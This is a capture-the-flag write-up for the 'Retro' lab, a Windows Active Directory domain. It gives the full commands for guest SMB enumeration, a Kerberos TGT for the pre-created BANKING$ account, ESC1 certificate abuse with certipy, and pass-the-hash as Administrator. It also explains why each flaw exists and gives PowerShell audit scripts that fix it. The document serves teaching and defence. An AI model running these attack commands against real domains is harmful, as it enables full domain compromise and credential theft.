- OS: Windows AD (Server 2022)
- Domain: retro.vl
Summary
Retro is an Easy Windows Active Directory box that chains three distinct misconfigurations. The first is organizational: the domain has a shared trainee account whose credentials are openly documented in an SMB share readable by anonymous guests. That pattern — shared kiosk or training accounts with well-known passwords — is common in environments where operational convenience wins over security hygiene.
The second is a legacy configuration artifact. A machine account called BANKING$ was pre-created with the “pre-Windows 2000 compatible” option, which causes Active Directory to set the initial password to the lowercase hostname. Although SMB authentication rejects a machine account that has not joined a domain properly (returning STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT), the Kerberos KDC still issues a TGT for that account. That TGT is enough to interact with ADCS as a domain computer principal.
The third is a certificate template misconfiguration classified as ESC1: the RetroClients template allows Domain Computers to enroll, permits the enrollee to supply an arbitrary Subject Alternative Name, and carries the Client Authentication extended key usage. Those three properties together mean any domain computer — including BANKING$ — can request a certificate asserting the identity of any principal in the domain, including Administrator. Certipy converts that certificate into an NT hash via PKINIT, and the hash grants full domain access.
Recon
```shell
netexec smb <DC>                                 # Windows Server 2022, domain retro.vl
netexec smb <DC> -u guest -p '' --shares         # Trainees (READ), Notes (no access as guest)
smbclient //<DC>/Trainees -U guest%              # Important.txt: shared trainee account
netexec smb <DC> -u trainee -p trainee           # VALID
```
Anonymous SMB enumeration immediately reveals two non-default shares. Trainees is guest-readable, which is unusual — most domain controllers do not expose custom shares to unauthenticated users. The file inside (Important.txt) documents a shared training account, giving away both the username and a trivially guessable password. This is the first sign that operational convenience has been prioritized over least-privilege access.
```shell
smbclient //<DC>/Notes -U trainee%trainee
# user.txt + ToDo.txt (mentions BANKING$ pre-created computer account)
```
With trainee credentials the Notes share becomes readable. It contains user.txt directly and a ToDo.txt that explicitly references a pre-created computer account named BANKING$. That file is both the user flag and an in-band hint pointing to the next step: the domain has a machine account created with legacy compatibility settings that has not been cleaned up.
Foothold — pre-Win2000 BANKING$
RID brute-force through the trainee account finds BANKING$ at a non-standard RID, confirming it exists as a real domain object. The pre-Windows 2000 compatible creation process sets the machine account’s initial password to the lowercase hostname, so the password for BANKING$ is simply banking. SMB authentication fails — the workstation trust flag was never set — but the Kerberos KDC validates the password independently and issues a TGT regardless of workstation trust status.
```shell
netexec smb <DC> -u trainee -p trainee --rid-brute 5000 | grep '\$'
# BANKING$ at RID 1106
getTGT.py -dc-ip <DC> 'retro.vl/BANKING$:banking'
# Saves BANKING$.ccache — Kerberos TGT issued even though SMB gives NOLOGON_WORKSTATION_TRUST
export KRB5CCNAME=BANKING$.ccache
```
User Flag
user.txt is not behind a shell — it lives directly in the Notes SMB share and is readable as soon as trainee:trainee credentials are established. No code execution is required:
```shell
smbclient //<DC>/Notes -U trainee%trainee -c 'get user.txt'
```
This is deliberate box design: the user flag is available the moment you enumerate your way into a valid low-privilege identity, before exploitation begins. The flag is owned by the share’s configuration, not by a logged-in user’s desktop.
Privesc — ESC1 (RetroClients template)
Certipy enumeration with the BANKING$ TGT finds the RetroClients template flagged as ESC1: Domain Computers can enroll, the enrollee supplies the Subject, and the Client Authentication EKU is set. The key-size 4096 requirement is enforced by the template — certificates with shorter keys are rejected.
```shell
certipy-ad find -k -no-pass -dc-ip <DC> -target dc.retro.vl -vulnerable
# RetroClients template — ESC1 confirmed

# Get Administrator SID
lookupsid.py retro.vl/trainee:trainee@<DC> 500

# Request cert with SID embedded (required for modern certipy auth)
certipy-ad req -k -no-pass -dc-ip <DC> -target dc.retro.vl -dc-host DC.retro.vl \
    -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl \
    -key-size 4096 -sid <admin-SID>

certipy-ad auth -pfx administrator.pfx -domain retro.vl -dc-ip <DC>
# → Administrator NT hash

netexec smb <DC> -u Administrator -H <NT-hash> -x 'type C:\Users\Administrator\Desktop\root.txt'
```
Important nuances
- No password change needed: `getTGT.py` with the pre-Win2000 password works directly. SMB login fails (NOLOGON_WORKSTATION_TRUST) but Kerberos TGT issuance succeeds independently.
- `-sid` flag is mandatory: Certipy v5 `auth` fails with “Object SID mismatch” if the cert doesn’t contain the user’s object SID. Pass `-sid <admin-SID>` to `req`.
- `-dc-host` required for Kerberos `req`: without `-dc-host`, Certipy times out on the NetBIOS resolution step when using Kerberos authentication.
Why each step worked
Shared trainee account. Active Directory gives every authenticated domain user a baseline level of trust: they can read shares, enumerate objects, and interact with domain services. When an organization collapses multiple people into one shared account, a single disclosure — a sticky note, a chat message, a file left world-readable — compromises every resource that account can reach. The Important.txt file in the guest-readable share illustrates how operational shortcuts in training environments become standing vulnerabilities: the account persists, the password never rotates, and the breadcrumb never gets cleaned up.
Pre-Windows 2000 compatibility password. When a computer account is created with the “pre-Windows 2000 compatible” checkbox, Active Directory sets the initial password to the lowercase version of the NetBIOS machine name. This behavior is documented and exists for backward compatibility with older systems that could not negotiate a randomized password during domain join. The account BANKING$ was never actually joined to the domain — its workstation trust flag was never upgraded — so SMB authentication correctly rejects it. But the Kerberos KDC validates the password independently and issues a TGT regardless of workstation trust status. That TGT is a Kerberos identity for a domain computer principal, which is exactly what ADCS enrollment checks against.
ESC1 certificate template abuse. ADCS ESC1 occurs when three conditions align: the template allows a non-administrative principal to enroll, the template permits the enrollee to specify an arbitrary Subject Alternative Name (SAN), and the resulting certificate is valid for Client Authentication. When all three are true, any enrollee can assert the identity of any other account in the directory — including Domain Admins — simply by naming that account in the certificate request. The RetroClients template grants enrollment rights to Domain Computers, so BANKING$ satisfies that check. Certipy embeds the target account’s object SID in the certificate (required in modern environments to prevent SID-spoofing mismatches), then uses PKINIT to authenticate as Administrator and retrieve the NT hash.
Counterfactuals
Replacing the shared trainee account with individual per-trainee accounts, each with a unique password and a short expiry, closes the first link in the chain. Without a known reusable credential, an attacker cannot move from unauthenticated SMB guest access to domain user enumeration. Removing guest read access from the Trainees share eliminates even the ability to find the account name.
Auditing pre-Windows 2000 compatible machine accounts and either deleting them or randomizing their passwords removes the Kerberos-only foothold. Specifically, accounts with WORKSTATION_TRUST_ACCOUNT status that have never completed a domain join should either be deleted or have their password set to a random 120-character value via Set-ADAccountPassword. The predictable default password is the entire reason BANKING$ is exploitable.
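As an added example (not part of the original writeup), the audit and remediation described above in PowerShell: it lists computer accounts that still carry the pre-created signature and resets each one to a random 120-character password with `Set-ADAccountPassword`. It assumes the RSAT `ActiveDirectory` module and an account allowed to reset computer passwords, and uses the `PASSWD_NOTREQD` bit plus a zero `logonCount` as the heuristic for "created but never joined".

```powershell
# Added example, not from the original writeup. Finds computer accounts that look
# pre-created and never joined, then randomizes their passwords.
# Assumes: RSAT ActiveDirectory module; rights to reset computer account passwords.
Import-Module ActiveDirectory

$WORKSTATION_TRUST_ACCOUNT = 0x1000   # userAccountControl: machine account
$PASSWD_NOTREQD            = 0x0020   # userAccountControl: set on pre-created accounts,
                                      # cleared once a real domain join sets a key

# Heuristic: machine account, PASSWD_NOTREQD still set, never logged on (logonCount 0).
# The matching rule 1.2.840.113556.1.4.803 is LDAP bitwise AND.
$filter = '(&(objectCategory=computer)' +
          "(userAccountControl:1.2.840.113556.1.4.803:=$($WORKSTATION_TRUST_ACCOUNT -bor $PASSWD_NOTREQD))" +
          '(|(logonCount=0)(!(logonCount=*))))'
$suspect = Get-ADComputer -LDAPFilter $filter -Properties userAccountControl, logonCount, whenCreated, pwdLastSet

$suspect | Select-Object Name, whenCreated, logonCount, userAccountControl | Format-Table -AutoSize

function New-RandomPassword {
    param([int]$Length = 120)
    # Printable ASCII 33..126 from the cryptographic RNG (tiny modulo bias is irrelevant at 120 chars).
    $bytes = New-Object byte[] $Length
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
    -join ($bytes | ForEach-Object { [char](33 + ($_ % 94)) })
}

foreach ($c in $suspect) {
    $secure = ConvertTo-SecureString -String (New-RandomPassword) -AsPlainText -Force
    # -Reset replaces the password without knowing the old one (the lowercase hostname).
    Set-ADAccountPassword -Identity $c.DistinguishedName -Reset -NewPassword $secure
    # Clearing PASSWD_NOTREQD removes the pre-created signature as well.
    Set-ADAccountControl -Identity $c.DistinguishedName -PasswordNotRequired $false
    Write-Output "Randomized password for $($c.SamAccountName)"
}
```

Run the query alone first and review the list; any account that is a legitimate pending join should be deleted or re-joined rather than silently reset.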
For the certificate template, disabling “Enrollee Supplies Subject” on RetroClients and moving to a Subject built from Active Directory attributes removes the ability to request certificates for arbitrary identities. Additionally, restricting enrollment rights to specific named service accounts — rather than the broad Domain Computers group — means a compromised machine account cannot enroll at all. Either change alone would have broken the ESC1 condition.
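As an added example (not part of the original writeup), a PowerShell check for the three ESC1 conditions named in the "Why each step worked" and counterfactual sections: broad enrollment rights, "Enrollee Supplies Subject", and a client-authentication-capable EKU. It reads template objects from the Configuration partition, which any domain user can do, and assumes the RSAT `ActiveDirectory` module; it goes slightly beyond the text by also treating the PKINIT, Smart Card Logon and Any Purpose EKUs (and an empty EKU list) as client-auth-capable.

```powershell
# Added example, not from the original writeup. Reports every certificate template
# that satisfies the three ESC1 conditions at once: broad enrollment rights,
# enrollee-supplied subject, and an EKU permitting client authentication.
# Assumes: RSAT ActiveDirectory module; any domain user can read the config partition.
Import-Module ActiveDirectory

$ENROLLEE_SUPPLIES_SUBJECT = 0x1                   # msPKI-Certificate-Name-Flag bit
$CLIENT_AUTH_OIDS = @('1.3.6.1.5.5.7.3.2',          # Client Authentication
                      '1.3.6.1.5.2.3.4',            # PKINIT Client Authentication
                      '1.3.6.1.4.1.311.20.2.2',     # Smart Card Logon
                      '2.5.29.37.0')                # Any Purpose
$ENROLL_RIGHT = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment right
$BROAD = @('Domain Computers', 'Domain Users', 'Authenticated Users', 'Everyone')

$base = "CN=Certificate Templates,CN=Public Key Services,CN=Services," +
        (Get-ADRootDSE).configurationNamingContext
$templates = Get-ADObject -SearchBase $base -LDAPFilter '(objectClass=pKICertificateTemplate)' `
    -Properties msPKI-Certificate-Name-Flag, pKIExtendedKeyUsage, nTSecurityDescriptor

function Test-Esc1 {
    param($Template)
    $suppliesSubject = ($Template.'msPKI-Certificate-Name-Flag' -band $ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $ekus = @($Template.pKIExtendedKeyUsage)
    # No EKU at all means the certificate is good for any purpose, including client auth.
    $clientAuth = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $CLIENT_AUTH_OIDS -contains $_ }).Count -gt 0)

    $broadEnroll = @()
    foreach ($ace in $Template.nTSecurityDescriptor.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = ($ace.IdentityReference.Value -split '\\')[-1]
        $extended = $ace.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)
        # Empty ObjectType = all extended rights (also what a GenericAll ACE carries).
        $isEnroll = $extended -and ($ace.ObjectType -eq $ENROLL_RIGHT -or $ace.ObjectType -eq [guid]::Empty)
        if ($isEnroll -and $BROAD -contains $who) { $broadEnroll += $who }
    }
    [pscustomobject]@{
        Template        = $Template.Name
        SuppliesSubject = $suppliesSubject
        ClientAuth      = $clientAuth
        BroadEnrollment = ($broadEnroll | Sort-Object -Unique) -join ', '
        ESC1            = $suppliesSubject -and $clientAuth -and ($broadEnroll.Count -gt 0)
    }
}

$templates | ForEach-Object { Test-Esc1 $_ } | Where-Object ESC1 | Format-Table -AutoSize
```

A template that shows up here with `Domain Computers` in the BroadEnrollment column is exactly the RetroClients pattern; fixing any one of the three columns breaks the condition.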
Key Takeaways
- Guest-readable SMB shares on a DC are high-value recon targets: they often contain credentials or hints written for legitimate users that attackers can read equally well.
- A machine account TGT is enough to drive ADCS enrollment — SMB authentication failure does not mean Kerberos is closed.
- ESC1 requires three simultaneous conditions; auditing for any one of them (enrollment rights, SAN control, Client Auth EKU) is enough to catch the class.
- The `-sid` flag in `certipy req` is mandatory in modern environments: without the object SID embedded in the certificate, authentication fails with a SID mismatch error even if the certificate itself is valid.
References
- Prior reconstruction from: 0xdf “HTB: Retro”, IppSec video walkthrough